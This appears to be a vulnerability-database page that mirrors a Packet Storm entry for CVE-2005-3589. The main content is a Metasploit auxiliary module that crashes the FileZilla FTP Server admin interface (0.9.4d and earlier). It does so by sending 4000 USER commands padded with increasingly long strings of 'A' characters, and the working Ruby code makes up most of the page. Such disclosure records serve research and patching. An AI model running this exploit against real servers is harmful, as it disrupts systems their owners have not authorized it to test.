FileZilla FTP Server Admin Interface Denial of Service

🗓️ 31 Aug 2024 00:00:00Reported by Jay Turla, metasploit.comType

packetstorm🔗 packetstormsecurity.com👁 238 Views

FileZilla FTP Server Admin Interface Denial of Service in versions 0.9.4d and earlier by sending excessively long USER command

Reporter	Title	Published	Views	Family All 6
Tenable Nessus	FileZilla FTP Server < 0.9.6 Multiple DoS	22 Mar 200500:00	–	nessus
Circl	CVE-2005-3589	29 May 201815:50	–	circl
CVE	CVE-2005-3589	16 Nov 200507:37	–	cve
Cvelist	CVE-2005-3589	16 Nov 200507:37	–	cvelist
Metasploit	FileZilla FTP Server Admin Interface Denial of Service	11 Jan 200914:38	–	metasploit
NVD	CVE-2005-3589	16 Nov 200507:42	–	nvd

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Tcp  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'FileZilla FTP Server Admin Interface Denial of Service',  
'Description' => %q{  
This module triggers a Denial of Service condition in the FileZilla FTP  
Server Administration Interface in versions 0.9.4d and earlier.  
By sending a procession of excessively long USER commands to the FTP  
Server, the Administration Interface (FileZilla Server Interface.exe)  
when running, will overwrite the stack with our string and generate an  
exception. The FileZilla FTP Server itself will continue functioning.  
},  
'Author' => [ 'aushack' ],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'BID', '15346' ],  
[ 'CVE', '2005-3589' ],  
[ 'EDB', '1336' ],  
[ 'OSVDB', '20817' ]  
],  
'DisclosureDate' => '2005-11-07'))  
end  
  
def run  
print_status("Sending 4000 packets, this may take a while.")  
  
4000.times do |x|  
connect  
sock.put("USER #{"A" * x}\r\n")  
disconnect  
end  
end  
end  
`

31 Aug 2024 00:00Current

7.4High risk

Vulners AI Score7.4

CVSS 27.8

EPSS0.67665